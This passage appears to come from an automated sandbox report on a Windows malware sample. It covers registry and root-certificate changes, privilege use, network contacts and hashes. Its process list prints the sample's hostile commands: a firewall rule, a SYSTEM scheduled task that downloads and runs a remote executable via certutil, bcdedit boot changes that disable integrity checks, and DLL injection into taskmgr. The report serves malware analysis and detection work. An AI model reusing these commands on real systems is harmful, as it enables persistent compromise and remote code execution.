| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-492 = "India Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Windows\rss\csrss.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\rss\csrss.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe
"C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108021129.log C:\Windows\Logs\CBS\CbsPersist_20241108021129.cab
C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe
"C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 990633e1-bd9b-4978-a498-df262a301266.ninhaine.com | udp |
| US | 8.8.8.8:53 | server5.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server5.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server5.ninhaine.com | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| CZ | 46.8.8.100:443 | server5.ninhaine.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server5.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server5.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | server5.2makestorage.com | udp |
Files
memory/2600-0-0x0000000002550000-0x000000000298C000-memory.dmp
memory/2600-1-0x0000000002550000-0x000000000298C000-memory.dmp
memory/2600-2-0x0000000002990000-0x00000000032B6000-memory.dmp
memory/2600-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2600-5-0x0000000002550000-0x000000000298C000-memory.dmp
memory/2600-7-0x0000000002990000-0x00000000032B6000-memory.dmp
memory/2600-6-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2720-8-0x00000000026C0000-0x0000000002AFC000-memory.dmp
memory/2720-9-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2720-10-0x0000000000400000-0x0000000000D41000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | dde0965428c655c1fabbcba5a44e7830 |
| SHA1 | b5118f55982bf9784bb34a3f0af738f7d409a5ff |
| SHA256 | 7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4 |
| SHA512 | f6b83ff23e0e7102a69bf43e723f312acb0bbf95e04d7386513cc2c5b2f9e160f0f38b179688702675ecb7c4a0782fad1f007f3db59c2104aa08a7cdcc6b2e13 |
memory/2720-20-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-21-0x00000000028B0000-0x0000000002CEC000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
